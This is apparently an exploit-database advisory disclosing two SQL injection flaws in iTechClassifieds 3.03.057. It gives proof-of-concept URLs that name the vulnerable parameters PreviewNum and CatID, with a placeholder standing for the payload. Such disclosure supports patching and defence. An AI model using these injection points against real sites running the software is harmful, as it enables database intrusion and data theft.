iTechClassifieds 3.03.057 - SQL Injection



EKU-ID: 36141 CVE: CVE-2014-100020;OSVDB-41071;OSVDB-102457;CVE-2008-0685 OSVDB-ID:
Author: vinicius777 Published: 2014-01-23 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057


[1] SQL Injection - PreviewNun

PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]



[2] SQL Injection - CatID

PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]


#
#
# Greetz to g0tm1lk and TheColonial.